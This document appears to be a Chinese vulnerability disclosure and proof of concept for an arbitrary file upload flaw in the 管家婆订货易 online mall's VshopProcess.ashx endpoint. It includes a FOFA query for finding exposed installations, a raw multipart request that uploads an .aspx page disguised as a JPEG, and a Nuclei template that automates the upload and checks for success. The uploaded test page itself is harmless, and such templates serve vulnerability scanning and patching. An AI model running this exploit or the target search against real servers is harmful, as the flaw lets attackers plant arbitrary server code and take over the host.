管家婆订货易在线商城 VshopProcess 任意文件上传漏洞

# 搜索语法title="订货易"||title="管家婆分销ERP" || body="管家婆分销ERP" || body="ERP V3"

POST /API/VshopProcess.ashx?action=PostFileImg HTTP/1.1Host: IPUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/57.0.578.100 Safari/537.36Accept-Encoding: gzipConnection: closeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytCOFhbEjc3IfYaY5------WebKitFormBoundarytCOFhbEjc3IfYaY5Content-Disposition: form-data; name="fileup1i"; filename="ceshi.aspx"Content-Type: image/jpeg<%@ Page Language="C#" %><% Response.Write("Hello World!");System.IO.File.Delete(Request.ServerVariables["PATH_TRANSLATED"]);%>------WebKitFormBoundarytCOFhbEjc3IfYaY5--

# 上传文件地址http://IP/Storage/UserFileImg/52ee2f09-1a97-49b8-b73e-8c708a45a8e7.aspx

id: GJP-VshopProcess-uploadfileinfo:  name: 管家婆订货易在线商城VshopProcess.ashx接口处存在任意文件上传漏洞，恶意攻击者可能利用此漏洞上传恶意文件最终导致服务器失陷。  author: LY  severity: high  metadata:     fofa-query: title="订货易"||title="管家婆分销ERP" || body="管家婆分销ERP" || body="ERP V3"variables:  filename: "{{to_lower(rand_base(10))}}"  boundary: "{{to_lower(rand_base(20))}}"http:  - raw:      - |        POST /API/VshopProcess.ashx?action=PostFileImg HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/57.0.578.100 Safari/537.36        Accept-Encoding: gzip        Connection: close        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytCOFhbEjc3IfYaY5        ------WebKitFormBoundarytCOFhbEjc3IfYaY5        Content-Disposition: form-data; name="fileup1i"; filename="{{filename}}.aspx"        Content-Type: image/jpeg        <%@ Page Language="C#" %>        <%             Response.Write("Hello World!");            System.IO.File.Delete(Request.ServerVariables["PATH_TRANSLATED"]);        %>        ------WebKitFormBoundarytCOFhbEjc3IfYaY5--      - |        GET {{path}} HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0    extractors:      - type: regex        name: path        part: body        regex:           - '.*'        internal: true    matchers:      - type: dsl        dsl:          - status_code==200 && contains_all(body,"Hello World!")